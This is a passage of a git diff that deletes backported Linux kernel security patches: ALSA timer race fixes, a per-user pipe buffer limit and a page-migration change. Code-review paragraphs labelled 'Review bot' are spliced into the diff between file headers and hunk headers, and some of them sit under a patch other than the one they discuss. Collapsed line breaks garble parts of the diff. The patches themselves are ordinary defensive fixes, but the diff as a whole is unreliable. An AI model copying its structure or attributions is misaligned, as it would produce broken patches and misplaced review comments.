-+ /* Insert mem entry in mem_rb tree */ -+ spin_lock(&private->mem_lock); -+ kgsl_mem_entry_commit_mem_list(private, entry); -+ 
spin_unlock(&private->mem_lock);
- }
- } else {
- trace_kgsl_mem_unmapped_area_collision(entry, addr, len,
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2544/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2544/ANY/0001.patch
deleted file mode 100644
index 09cb3cc1..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2544/ANY/0001.patch
+++ /dev/null
@@ -1,38 +0,0 @@
-From 3567eb6af614dac436c4b16a8d426f9faed639b3 Mon Sep 17 00:00:00 2001
-From: Takashi Iwai
-Date: Tue, 12 Jan 2016 15:36:27 +0100
-Subject: ALSA: seq: Fix race at timer setup and close
-
-ALSA sequencer code has an open race between the timer setup ioctl and
-the close of the client. This was triggered by syzkaller fuzzer, and
-a use-after-free was caught there as a result.
-
-This patch papers over it by adding a proper queue->timer_mutex lock
-around the timer-related calls in the relevant code path.
-
-Reported-by: Dmitry Vyukov
-Tested-by: Dmitry Vyukov
-Cc:
-Signed-off-by: Takashi Iwai
----
- sound/core/seq/seq_queue.c | 2 ++
- 1 file changed, 2 insertions(+)
-
-diff --git a/sound/core/seq/seq_queue.c b/sound/core/seq/seq_queue.c
-index 7dfd0f4..0bec02e 100644
---- a/sound/core/seq/seq_queue.c
-+++ b/sound/core/seq/seq_queue.c
-@@ -142,8 +142,10 @@ static struct snd_seq_queue *queue_new(int owner, int locked)
- static void queue_delete(struct snd_seq_queue *q)
- {
- /* stop and release the timer */
-+ mutex_lock(&q->timer_mutex);
- snd_seq_timer_stop(q->timer);
- snd_seq_timer_close(q);
-+ mutex_unlock(&q->timer_mutex);
- /* wait until access free */
- snd_use_lock_sync(&q->use_lock);
- /* release resources... */
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2545/^4.4/0001.patch b/Patches/Linux_CVEs/CVE-2016-2545/^4.4/0001.patch
deleted file mode 100644
index 0c88b965..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2545/^4.4/0001.patch
+++ /dev/null
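Review bot: `kgsl_mem_entry_commit_process()` takes `process` but locks `entry->priv->mem_lock` and publishes into `entry->priv->mem_idr`, while the rb-tree insert it calls goes into `process->mem_rb`; if the two ever differ, the tree is modified under the wrong lock. I would use one of them throughout, e.g. `spin_lock(&process->mem_lock);` and `idr_replace(&process->mem_idr, entry, entry->id);`, and check the `idr_replace()` result instead of discarding it. `kgsl_mem_entry_commit_mem_list()` also relies on its callers holding the lock without saying so; `assert_spin_locked(&process->mem_lock);`, as in `kgsl_mem_entry_track_gpuaddr()`, would document that. Since the ID is now reserved with a NULL pointer, every lookup by ID has to treat NULL as not found and every error path after the reservation has to release the ID; neither is visible in these hunks.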
@@ -1,37 +0,0 @@
-From ee8413b01045c74340aa13ad5bdf905de32be736 Mon Sep 17 00:00:00 2001
-From: Takashi Iwai
-Date: Wed, 13 Jan 2016 21:35:06 +0100
-Subject: ALSA: timer: Fix double unlink of active_list
-
-ALSA timer instance object has a couple of linked lists and they are
-unlinked unconditionally at snd_timer_stop(). Meanwhile
-snd_timer_interrupt() unlinks it, but it calls list_del() which leaves
-the element list itself unchanged. This ends up with unlinking twice,
-and it was caught by syzkaller fuzzer.
-
-The fix is to use list_del_init() variant properly there, too.
-
-Reported-by: Dmitry Vyukov
-Tested-by: Dmitry Vyukov
-Cc:
-Signed-off-by: Takashi Iwai
----
- sound/core/timer.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/sound/core/timer.c b/sound/core/timer.c
-index 31f40f0..9241784df 100644
---- a/sound/core/timer.c
-+++ b/sound/core/timer.c
-@@ -694,7 +694,7 @@ void snd_timer_interrupt(struct snd_timer * timer, unsigned long ticks_left)
- } else {
- ti->flags &= ~SNDRV_TIMER_IFLG_RUNNING;
- if (--timer->running)
-- list_del(&ti->active_list);
-+ list_del_init(&ti->active_list);
- }
- if ((timer->hw.flags & SNDRV_TIMER_HW_TASKLET) ||
- (ti->flags & SNDRV_TIMER_IFLG_FAST))
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2546/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2546/ANY/0001.patch
deleted file mode 100644
index 0c11987f..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2546/ANY/0001.patch
+++ /dev/null
@@ -1,122 +0,0 @@
-From af368027a49a751d6ff4ee9e3f9961f35bb4fede Mon Sep 17 00:00:00 2001
-From: Takashi Iwai
-Date: Wed, 13 Jan 2016 17:48:01 +0100
-Subject: ALSA: timer: Fix race among timer ioctls
-
-ALSA timer ioctls have an open race and this may lead to a
-use-after-free of timer instance object. A simplistic fix is to make
-each ioctl exclusive. We have already tread_sem for controlling the
-tread, and extend this as a global mutex to be applied to each ioctl.
-
-The downside is, of course, the worse concurrency. But these ioctls
-aren't to be parallel accessible, in anyway, so it should be fine to
-serialize there.
-
-Reported-by: Dmitry Vyukov
-Tested-by: Dmitry Vyukov
-Cc:
-Signed-off-by: Takashi Iwai
----
- sound/core/timer.c | 32 +++++++++++++++++++-------------
- 1 file changed, 19 insertions(+), 13 deletions(-)
-
-diff --git a/sound/core/timer.c b/sound/core/timer.c
-index 9241784df..3810ee8 100644
---- a/sound/core/timer.c
-+++ b/sound/core/timer.c
-@@ -73,7 +73,7 @@ struct snd_timer_user {
- struct timespec tstamp; /* trigger tstamp */
- wait_queue_head_t qchange_sleep;
- struct fasync_struct *fasync;
-- struct mutex tread_sem;
-+ struct mutex ioctl_lock;
- };
-
- /* list of timers */
-@@ -1253,7 +1253,7 @@ static int snd_timer_user_open(struct inode *inode, struct file *file)
- return -ENOMEM;
- spin_lock_init(&tu->qlock);
- init_waitqueue_head(&tu->qchange_sleep);
-- mutex_init(&tu->tread_sem);
-+ mutex_init(&tu->ioctl_lock);
- tu->ticks = 1;
- tu->queue_size = 128;
- tu->queue = kmalloc(tu->queue_size * sizeof(struct snd_timer_read),
-@@ -1273,8 +1273,10 @@ static int snd_timer_user_release(struct inode *inode, struct file *file)
- if (file->private_data) {
- tu = file->private_data;
- file->private_data = NULL;
-+ mutex_lock(&tu->ioctl_lock);
- if (tu->timeri)
- snd_timer_close(tu->timeri);
-+ mutex_unlock(&tu->ioctl_lock);
- kfree(tu->queue);
- kfree(tu->tqueue);
- kfree(tu);
-@@ -1512,7 +1514,6 @@ static int snd_timer_user_tselect(struct file 
*file,
- int err = 0;
-
- tu = file->private_data;
-- mutex_lock(&tu->tread_sem);
- if (tu->timeri) {
- snd_timer_close(tu->timeri);
- tu->timeri = NULL;
-@@ -1556,7 +1557,6 @@ static int snd_timer_user_tselect(struct file *file,
- }
-
- __err:
-- mutex_unlock(&tu->tread_sem);
- return err;
- }
-
-@@ -1769,7 +1769,7 @@ enum {
- SNDRV_TIMER_IOCTL_PAUSE_OLD = _IO('T', 0x23),
- };
-
--static long snd_timer_user_ioctl(struct file *file, unsigned int cmd,
-+static long __snd_timer_user_ioctl(struct file *file, unsigned int cmd,
- unsigned long arg)
- {
- struct snd_timer_user *tu;
-@@ -1786,17 +1786,11 @@ static long snd_timer_user_ioctl(struct file *file, unsigned int cmd,
- {
- int xarg;
-
-- mutex_lock(&tu->tread_sem);
-- if (tu->timeri) { /* too late */
-- mutex_unlock(&tu->tread_sem);
-+ if (tu->timeri) /* too late */
- return -EBUSY;
-- }
-- if (get_user(xarg, p)) {
-- mutex_unlock(&tu->tread_sem);
-+ if (get_user(xarg, p))
- return -EFAULT;
-- }
- tu->tread = xarg ? 1 : 0;
-- mutex_unlock(&tu->tread_sem);
- return 0;
- }
- case SNDRV_TIMER_IOCTL_GINFO:
-@@ -1829,6 +1823,18 @@ static long snd_timer_user_ioctl(struct file *file, unsigned int cmd,
- return -ENOTTY;
- }
-
-+static long snd_timer_user_ioctl(struct file *file, unsigned int cmd,
-+ unsigned long arg)
-+{
-+ struct snd_timer_user *tu = file->private_data;
-+ long ret;
-+
-+ mutex_lock(&tu->ioctl_lock);
-+ ret = __snd_timer_user_ioctl(file, cmd, arg);
-+ mutex_unlock(&tu->ioctl_lock);
-+ return ret;
-+}
-+
- static int snd_timer_user_fasync(int fd, struct file * file, int on)
- {
- struct snd_timer_user *tu;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2547/^4.4/0001.patch b/Patches/Linux_CVEs/CVE-2016-2547/^4.4/0001.patch
deleted file mode 100644
index 7df556be..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2547/^4.4/0001.patch
+++ /dev/null
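Review bot: `ioctl_lock` is taken only in the new `snd_timer_user_ioctl()` wrapper and around `snd_timer_close()` in release, so it serializes ioctls against each other but not against the other file operations on the same `struct snd_timer_user`. The read and poll handlers are outside these hunks; if they look at state an ioctl changes (`tu->tread` is written in the TREAD case shown here), they would need the same mutex or another documented rule. The field would also benefit from a comment, e.g. `struct mutex ioctl_lock; /* serializes all ioctls on this file and the close in release */`. With tselect no longer locking on its own, `__snd_timer_user_ioctl()` must never be called without the lock, and a one-line comment above it should say so.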
@@ -1,101 +0,0 @@
-From b5a663aa426f4884c71cd8580adae73f33570f0d Mon Sep 17 00:00:00 2001
-From: Takashi Iwai
-Date: Thu, 14 Jan 2016 16:30:58 +0100
-Subject: ALSA: timer: Harden slave timer list handling
-
-A slave timer instance might be still accessible in a racy way while
-operating the master instance as it lacks of locking. Since the
-master operation is mostly protected with timer->lock, we should cope
-with it while changing the slave instance, too. Also, some linked
-lists (active_list and ack_list) of slave instances aren't unlinked
-immediately at stopping or closing, and this may lead to unexpected
-accesses.
-
-This patch tries to address these issues. It adds spin lock of
-timer->lock (either from master or slave, which is equivalent) in a
-few places. For avoiding a deadlock, we ensure that the global
-slave_active_lock is always locked at first before each timer lock.
-
-Also, ack and active_list of slave instances are properly unlinked at
-snd_timer_stop() and snd_timer_close().
-
-Last but not least, remove the superfluous call of _snd_timer_stop()
-at removing slave links. This is a noop, and calling it may confuse
-readers wrt locking. Further cleanup will follow in a later patch.
-
-Actually we've got reports of use-after-free by syzkaller fuzzer, and
-this hopefully fixes these issues.
-
-Reported-by: Dmitry Vyukov
-Cc:
-Signed-off-by: Takashi Iwai
----
- sound/core/timer.c | 18 ++++++++++++++----
- 1 file changed, 14 insertions(+), 4 deletions(-)
-
-diff --git a/sound/core/timer.c b/sound/core/timer.c
-index 3810ee8..4e8d7bf 100644
---- a/sound/core/timer.c
-+++ b/sound/core/timer.c
-@@ -215,11 +215,13 @@ static void snd_timer_check_master(struct snd_timer_instance *master)
- slave->slave_id == master->slave_id) {
- list_move_tail(&slave->open_list, &master->slave_list_head);
- spin_lock_irq(&slave_active_lock);
-+ spin_lock(&master->timer->lock);
- slave->master = master;
- slave->timer = master->timer;
- if (slave->flags & SNDRV_TIMER_IFLG_RUNNING)
- list_add_tail(&slave->active_list,
- &master->slave_active_head);
-+ spin_unlock(&master->timer->lock);
- spin_unlock_irq(&slave_active_lock);
- }
- }
-@@ -346,15 +348,18 @@ int snd_timer_close(struct snd_timer_instance *timeri)
- timer->hw.close)
- timer->hw.close(timer);
- /* remove slave links */
-+ spin_lock_irq(&slave_active_lock);
-+ spin_lock(&timer->lock);
- list_for_each_entry_safe(slave, tmp, &timeri->slave_list_head,
- open_list) {
-- spin_lock_irq(&slave_active_lock);
-- _snd_timer_stop(slave, 1, SNDRV_TIMER_EVENT_RESOLUTION);
- list_move_tail(&slave->open_list, &snd_timer_slave_list);
- slave->master = NULL;
- slave->timer = NULL;
-- spin_unlock_irq(&slave_active_lock);
-+ list_del_init(&slave->ack_list);
-+ list_del_init(&slave->active_list);
- }
-+ spin_unlock(&timer->lock);
-+ spin_unlock_irq(&slave_active_lock);
- mutex_unlock(®ister_mutex);
- }
- out:
-@@ -441,9 +446,12 @@ static int snd_timer_start_slave(struct snd_timer_instance *timeri)
-
- spin_lock_irqsave(&slave_active_lock, flags);
- timeri->flags |= SNDRV_TIMER_IFLG_RUNNING;
-- if (timeri->master)
-+ if (timeri->master && timeri->timer) {
-+ spin_lock(&timeri->timer->lock);
- list_add_tail(&timeri->active_list,
- &timeri->master->slave_active_head);
-+ spin_unlock(&timeri->timer->lock);
-+ }
- 
spin_unlock_irqrestore(&slave_active_lock, flags);
- return 1; /* delayed start */
- }
-@@ -489,6 +497,8 @@ static int _snd_timer_stop(struct snd_timer_instance * timeri,
- if (!keep_flag) {
- spin_lock_irqsave(&slave_active_lock, flags);
- timeri->flags &= ~SNDRV_TIMER_IFLG_RUNNING;
-+ list_del_init(&timeri->ack_list);
-+ list_del_init(&timeri->active_list);
- spin_unlock_irqrestore(&slave_active_lock, flags);
- }
- goto __end;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2549/^4.4/0001.patch b/Patches/Linux_CVEs/CVE-2016-2549/^4.4/0001.patch
deleted file mode 100644
index cede879f..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2549/^4.4/0001.patch
+++ /dev/null
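Review bot: In the `_snd_timer_stop` hunk the two added `list_del_init()` calls run under `slave_active_lock` alone, while the other three hunks of this patch take `timer->lock` as well before touching a slave's `active_list`. If the interrupt path walks `ack_list`/`active_list` under `timer->lock` only (it is outside these hunks, though the commit message says master operations are protected by it), the unlink here can still race with it. I would bracket the two calls with `if (timeri->timer) spin_lock(&timeri->timer->lock);` and the matching `spin_unlock()`, keeping the order `slave_active_lock` first. That ordering rule is stated only in the commit message; a comment at the definition of `slave_active_lock` should carry it. `_snd_timer_stop()` starts and ends outside the hunk.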
@@ -1,54 +0,0 @@ -From 2ba1fe7a06d3624f9a7586d672b55f08f7c670f3 Mon Sep 17 00:00:00 2001 -From: Takashi Iwai -Date: Mon, 18 Jan 2016 13:52:47 +0100 -Subject: ALSA: hrtimer: Fix stall by hrtimer_cancel() - -hrtimer_cancel() waits for the completion from the callback, thus it -must not be called inside the callback itself. This was already a -problem in the past with ALSA hrtimer driver, and the early commit -[fcfdebe70759: ALSA: hrtimer - Fix lock-up] tried to address it. - -However, the previous fix is still insufficient: it may still cause a -lockup when the ALSA timer instance reprograms itself in its callback. -Then it invokes the start function even in snd_timer_interrupt() that -is called in hrtimer callback itself, results in a CPU stall. This is -no hypothetical problem but actually triggered by syzkaller fuzzer. - -This patch tries to fix the issue again. Now we call -hrtimer_try_to_cancel() at both start and stop functions so that it -won't fall into a deadlock, yet giving some chance to cancel the queue -if the functions have been called outside the callback. The proper -hrtimer_cancel() is called in anyway at closing, so this should be -enough. 
- -Reported-and-tested-by: Dmitry Vyukov -Cc: -Signed-off-by: Takashi Iwai ---- - sound/core/hrtimer.c | 3 ++- - 1 file changed, 2 insertions(+), 1 deletion(-) - -diff --git a/sound/core/hrtimer.c b/sound/core/hrtimer.c -index f845ecf..656d9a9 100644 ---- a/sound/core/hrtimer.c -+++ b/sound/core/hrtimer.c -@@ -90,7 +90,7 @@ static int snd_hrtimer_start(struct snd_timer *t) - struct snd_hrtimer *stime = t->private_data; - - atomic_set(&stime->running, 0); -- hrtimer_cancel(&stime->hrt); -+ hrtimer_try_to_cancel(&stime->hrt); - hrtimer_start(&stime->hrt, ns_to_ktime(t->sticks * resolution), - HRTIMER_MODE_REL); - atomic_set(&stime->running, 1); -@@ -101,6 +101,7 @@ static int snd_hrtimer_stop(struct snd_timer *t) - { - struct snd_hrtimer *stime = t->private_data; - atomic_set(&stime->running, 0); -+ hrtimer_try_to_cancel(&stime->hrt); - return 0; - } - --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-2847/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2847/ANY/0001.patch deleted file mode 100644 index 843bdd83..00000000 --- a/Patches/Linux_CVEs/CVE-2016-2847/ANY/0001.patch +++ /dev/null 
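Review bot: Both `hrtimer_try_to_cancel()` calls discard the return value and neither says why the non-waiting variant is used. In `snd_hrtimer_start()` a return of -1 means the callback is running at that moment and the timer was not cancelled, and `hrtimer_start()` follows regardless; the commit message argues that this is acceptable, and the code should say so. I would add above the call `/* may run from the hrtimer callback itself, where hrtimer_cancel() would wait forever; the final cancel happens at close */`.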
@@ -1,250 +0,0 @@ -From 759c01142a5d0f364a462346168a56de28a80f52 Mon Sep 17 00:00:00 2001 -From: Willy Tarreau -Date: Mon, 18 Jan 2016 16:36:09 +0100 -Subject: pipe: limit the per-user amount of pages allocated in pipes - -On no-so-small systems, it is possible for a single process to cause an -OOM condition by filling large pipes with data that are never read. A -typical process filling 4000 pipes with 1 MB of data will use 4 GB of -memory. On small systems it may be tricky to set the pipe max size to -prevent this from happening. - -This patch makes it possible to enforce a per-user soft limit above -which new pipes will be limited to a single page, effectively limiting -them to 4 kB each, as well as a hard limit above which no new pipes may -be created for this user. This has the effect of protecting the system -against memory abuse without hurting other users, and still allowing -pipes to work correctly though with less data at once. - -The limit are controlled by two new sysctls : pipe-user-pages-soft, and -pipe-user-pages-hard. Both may be disabled by setting them to zero. The -default soft limit allows the default number of FDs per process (1024) -to create pipes of the default size (64kB), thus reaching a limit of 64MB -before starting to create only smaller pipes. With 256 processes limited -to 1024 FDs each, this results in 1024*64kB + (256*1024 - 1024) * 4kB = -1084 MB of memory allocated for a user. The hard limit is disabled by -default to avoid breaking existing applications that make intensive use -of pipes (eg: for splicing). 
- -Reported-by: socketpair@gmail.com -Reported-by: Tetsuo Handa -Mitigates: CVE-2013-4312 (Linux 2.0+) -Suggested-by: Linus Torvalds -Signed-off-by: Willy Tarreau -Signed-off-by: Al Viro ---- - Documentation/sysctl/fs.txt | 23 ++++++++++++++++++++++ - fs/pipe.c | 47 +++++++++++++++++++++++++++++++++++++++++++-- - include/linux/pipe_fs_i.h | 4 ++++ - include/linux/sched.h | 1 + - kernel/sysctl.c | 14 ++++++++++++++ - 5 files changed, 87 insertions(+), 2 deletions(-) - -diff --git a/Documentation/sysctl/fs.txt b/Documentation/sysctl/fs.txt -index 88152f2..302b5ed 100644 ---- a/Documentation/sysctl/fs.txt -+++ b/Documentation/sysctl/fs.txt -@@ -32,6 +32,8 @@ Currently, these files are in /proc/sys/fs: - - nr_open - - overflowuid - - overflowgid -+- pipe-user-pages-hard -+- pipe-user-pages-soft - - protected_hardlinks - - protected_symlinks - - suid_dumpable -@@ -159,6 +161,27 @@ The default is 65534. - - ============================================================== - -+pipe-user-pages-hard: -+ -+Maximum total number of pages a non-privileged user may allocate for pipes. -+Once this limit is reached, no new pipes may be allocated until usage goes -+below the limit again. When set to 0, no limit is applied, which is the default -+setting. -+ -+============================================================== -+ -+pipe-user-pages-soft: -+ -+Maximum total number of pages a non-privileged user may allocate for pipes -+before the pipe size gets limited to a single page. Once this limit is reached, -+new pipes will be limited to a single page in size for this user in order to -+limit total memory usage, and trying to increase them using fcntl() will be -+denied until usage goes below the limit again. The default value allows to -+allocate up to 1024 pipes at their default size. When set to 0, no limit is -+applied. 
-+ -+============================================================== -+ - protected_hardlinks: - - A long-standing class of security issues is the hardlink-based -diff --git a/fs/pipe.c b/fs/pipe.c -index 42cf8dd..ab8dad3 100644 ---- a/fs/pipe.c -+++ b/fs/pipe.c -@@ -38,6 +38,12 @@ unsigned int pipe_max_size = 1048576; - */ - unsigned int pipe_min_size = PAGE_SIZE; - -+/* Maximum allocatable pages per user. Hard limit is unset by default, soft -+ * matches default values. -+ */ -+unsigned long pipe_user_pages_hard; -+unsigned long pipe_user_pages_soft = PIPE_DEF_BUFFERS * INR_OPEN_CUR; -+ - /* - * We use a start+len construction, which provides full use of the - * allocated memory. -@@ -583,20 +589,49 @@ pipe_fasync(int fd, struct file *filp, int on) - return retval; - } - -+static void account_pipe_buffers(struct pipe_inode_info *pipe, -+ unsigned long old, unsigned long new) -+{ -+ atomic_long_add(new - old, &pipe->user->pipe_bufs); -+} -+ -+static bool too_many_pipe_buffers_soft(struct user_struct *user) -+{ -+ return pipe_user_pages_soft && -+ atomic_long_read(&user->pipe_bufs) >= pipe_user_pages_soft; -+} -+ -+static bool too_many_pipe_buffers_hard(struct user_struct *user) -+{ -+ return pipe_user_pages_hard && -+ atomic_long_read(&user->pipe_bufs) >= pipe_user_pages_hard; -+} -+ - struct pipe_inode_info *alloc_pipe_info(void) - { - struct pipe_inode_info *pipe; - - pipe = kzalloc(sizeof(struct pipe_inode_info), GFP_KERNEL); - if (pipe) { -- pipe->bufs = kzalloc(sizeof(struct pipe_buffer) * PIPE_DEF_BUFFERS, GFP_KERNEL); -+ unsigned long pipe_bufs = PIPE_DEF_BUFFERS; -+ struct user_struct *user = get_current_user(); -+ -+ if (!too_many_pipe_buffers_hard(user)) { -+ if (too_many_pipe_buffers_soft(user)) -+ pipe_bufs = 1; -+ pipe->bufs = kzalloc(sizeof(struct pipe_buffer) * pipe_bufs, GFP_KERNEL); -+ } -+ - if (pipe->bufs) { - init_waitqueue_head(&pipe->wait); - pipe->r_counter = pipe->w_counter = 1; -- pipe->buffers = PIPE_DEF_BUFFERS; -+ pipe->buffers = 
pipe_bufs; -+ pipe->user = user; -+ account_pipe_buffers(pipe, 0, pipe_bufs); - mutex_init(&pipe->mutex); - return pipe; - } -+ free_uid(user); - kfree(pipe); - } - -@@ -607,6 +642,8 @@ void free_pipe_info(struct pipe_inode_info *pipe) - { - int i; - -+ account_pipe_buffers(pipe, pipe->buffers, 0); -+ free_uid(pipe->user); - for (i = 0; i < pipe->buffers; i++) { - struct pipe_buffer *buf = pipe->bufs + i; - if (buf->ops) -@@ -998,6 +1035,7 @@ static long pipe_set_size(struct pipe_inode_info *pipe, unsigned long nr_pages) - memcpy(bufs + head, pipe->bufs, tail * sizeof(struct pipe_buffer)); - } - -+ account_pipe_buffers(pipe, pipe->buffers, nr_pages); - pipe->curbuf = 0; - kfree(pipe->bufs); - pipe->bufs = bufs; -@@ -1069,6 +1107,11 @@ long pipe_fcntl(struct file *file, unsigned int cmd, unsigned long arg) - if (!capable(CAP_SYS_RESOURCE) && size > pipe_max_size) { - ret = -EPERM; - goto out; -+ } else if ((too_many_pipe_buffers_hard(pipe->user) || -+ too_many_pipe_buffers_soft(pipe->user)) && -+ !capable(CAP_SYS_RESOURCE) && !capable(CAP_SYS_ADMIN)) { -+ ret = -EPERM; -+ goto out; - } - ret = pipe_set_size(pipe, nr_pages); - break; -diff --git a/include/linux/pipe_fs_i.h b/include/linux/pipe_fs_i.h -index eb8b8ac..24f5470 100644 ---- a/include/linux/pipe_fs_i.h -+++ b/include/linux/pipe_fs_i.h -@@ -42,6 +42,7 @@ struct pipe_buffer { - * @fasync_readers: reader side fasync - * @fasync_writers: writer side fasync - * @bufs: the circular array of pipe buffers -+ * @user: the user who created this pipe - **/ - struct pipe_inode_info { - struct mutex mutex; -@@ -57,6 +58,7 @@ struct pipe_inode_info { - struct fasync_struct *fasync_readers; - struct fasync_struct *fasync_writers; - struct pipe_buffer *bufs; -+ struct user_struct *user; - }; - - /* -@@ -123,6 +125,8 @@ void pipe_unlock(struct pipe_inode_info *); - void pipe_double_lock(struct pipe_inode_info *, struct pipe_inode_info *); - - extern unsigned int pipe_max_size, pipe_min_size; -+extern unsigned long 
pipe_user_pages_hard; -+extern unsigned long pipe_user_pages_soft; - int pipe_proc_fn(struct ctl_table *, int, void __user *, size_t *, loff_t *); - - -diff --git a/include/linux/sched.h b/include/linux/sched.h -index 61aa9bb..1589ddc8 100644 ---- a/include/linux/sched.h -+++ b/include/linux/sched.h -@@ -835,6 +835,7 @@ struct user_struct { - #endif - unsigned long locked_shm; /* How many pages of mlocked shm ? */ - unsigned long unix_inflight; /* How many files in flight in unix sockets */ -+ atomic_long_t pipe_bufs; /* how many pages are allocated in pipe buffers */ - - #ifdef CONFIG_KEYS - struct key *uid_keyring; /* UID specific keyring */ -diff --git a/kernel/sysctl.c b/kernel/sysctl.c -index c810f8a..f6fd236 100644 ---- a/kernel/sysctl.c -+++ b/kernel/sysctl.c -@@ -1757,6 +1757,20 @@ static struct ctl_table fs_table[] = { - .proc_handler = &pipe_proc_fn, - .extra1 = &pipe_min_size, - }, -+ { -+ .procname = "pipe-user-pages-hard", -+ .data = &pipe_user_pages_hard, -+ .maxlen = sizeof(pipe_user_pages_hard), -+ .mode = 0644, -+ .proc_handler = proc_doulongvec_minmax, -+ }, -+ { -+ .procname = "pipe-user-pages-soft", -+ .data = &pipe_user_pages_soft, -+ .maxlen = sizeof(pipe_user_pages_soft), -+ .mode = 0644, -+ .proc_handler = proc_doulongvec_minmax, -+ }, - { } - }; - --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-3070/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3070/ANY/0001.patch deleted file mode 100644 index 0c801170..00000000 --- a/Patches/Linux_CVEs/CVE-2016-3070/ANY/0001.patch +++ /dev/null 
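Review bot: The `else if` added to `pipe_fcntl()` looks only at the pages the user already holds, not at `nr_pages`: a user just under `pipe_user_pages_soft` can still grow one pipe up to `pipe_max_size`, and a user over the limit gets -EPERM even when the request would shrink the pipe, although the new fs.txt text only speaks of denying increases. I would apply the test only when `nr_pages > pipe->buffers` and compare the projected total, `atomic_long_read(&pipe->user->pipe_bufs) - pipe->buffers + nr_pages`, with the two limits. `alloc_pipe_info()` has the same check-then-account gap: the limit is read before `account_pipe_buffers()` adds the new pages, so concurrent creators can all pass the check. `pipe_fcntl()` continues outside the hunk.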
@@ -1,163 +0,0 @@ -From af110cc4b24250faafd4f3b9879cf51e350d7799 Mon Sep 17 00:00:00 2001 -From: Hugh Dickins -Date: Fri, 15 Jul 2016 15:08:19 -0400 -Subject: mm: migrate dirty page without clear_page_dirty_for_io etc - -commit 42cb14b110a5698ccf26ce59c4441722605a3743 upstream. - -clear_page_dirty_for_io() has accumulated writeback and memcg subtleties -since v2.6.16 first introduced page migration; and the set_page_dirty() -which completed its migration of PageDirty, later had to be moderated to -__set_page_dirty_nobuffers(); then PageSwapBacked had to skip that too. - -No actual problems seen with this procedure recently, but if you look into -what the clear_page_dirty_for_io(page)+set_page_dirty(newpage) is actually -achieving, it turns out to be nothing more than moving the PageDirty flag, -and its NR_FILE_DIRTY stat from one zone to another. - -It would be good to avoid a pile of irrelevant decrementations and -incrementations, and improper event counting, and unnecessary descent of -the radix_tree under tree_lock (to set the PAGECACHE_TAG_DIRTY which -radix_tree_replace_slot() left in place anyway). - -Do the NR_FILE_DIRTY movement, like the other stats movements, while -interrupts still disabled in migrate_page_move_mapping(); and don't even -bother if the zone is the same. Do the PageDirty movement there under -tree_lock too, where old page is frozen and newpage not yet visible: -bearing in mind that as soon as newpage becomes visible in radix_tree, an -un-page-locked set_page_dirty() might interfere (or perhaps that's just -not possible: anything doing so should already hold an additional -reference to the old page, preventing its migration; but play safe). - -But we do still need to transfer PageDirty in migrate_page_copy(), for -those who don't go the mapping route through migrate_page_move_mapping(). - -CVE-2016-3070 - -Signed-off-by: Hugh Dickins -Cc: Christoph Lameter -Cc: "Kirill A. 
Shutemov" -Cc: Rik van Riel -Cc: Vlastimil Babka -Cc: Davidlohr Bueso -Cc: Oleg Nesterov -Cc: Sasha Levin -Cc: Dmitry Vyukov -Cc: KOSAKI Motohiro -Signed-off-by: Andrew Morton -Signed-off-by: Linus Torvalds -[ciwillia@brocade.com: backported to 3.10: adjusted context] -Signed-off-by: Charles (Chas) Williams -Signed-off-by: Willy Tarreau ---- - mm/migrate.c | 51 +++++++++++++++++++++++++++++++-------------------- - 1 file changed, 31 insertions(+), 20 deletions(-) - -diff --git a/mm/migrate.c b/mm/migrate.c -index a88c12f..a61500f 100644 ---- a/mm/migrate.c -+++ b/mm/migrate.c -@@ -30,6 +30,7 @@ - #include - #include - #include -+#include - #include - #include - #include -@@ -311,6 +312,8 @@ static int migrate_page_move_mapping(struct address_space *mapping, - struct page *newpage, struct page *page, - struct buffer_head *head, enum migrate_mode mode) - { -+ struct zone *oldzone, *newzone; -+ int dirty; - int expected_count = 0; - void **pslot; - -@@ -321,6 +324,9 @@ static int migrate_page_move_mapping(struct address_space *mapping, - return MIGRATEPAGE_SUCCESS; - } - -+ oldzone = page_zone(page); -+ newzone = page_zone(newpage); -+ - spin_lock_irq(&mapping->tree_lock); - - pslot = radix_tree_lookup_slot(&mapping->page_tree, -@@ -361,6 +367,13 @@ static int migrate_page_move_mapping(struct address_space *mapping, - set_page_private(newpage, page_private(page)); - } - -+ /* Move dirty while page refs frozen and newpage not yet exposed */ -+ dirty = PageDirty(page); -+ if (dirty) { -+ ClearPageDirty(page); -+ SetPageDirty(newpage); -+ } -+ - radix_tree_replace_slot(pslot, newpage); - - /* -@@ -370,6 +383,9 @@ static int migrate_page_move_mapping(struct address_space *mapping, - */ - page_unfreeze_refs(page, expected_count - 1); - -+ spin_unlock(&mapping->tree_lock); -+ /* Leave irq disabled to prevent preemption while updating stats */ -+ - /* - * If moved to a different zone then also account - * the page for that zone. 
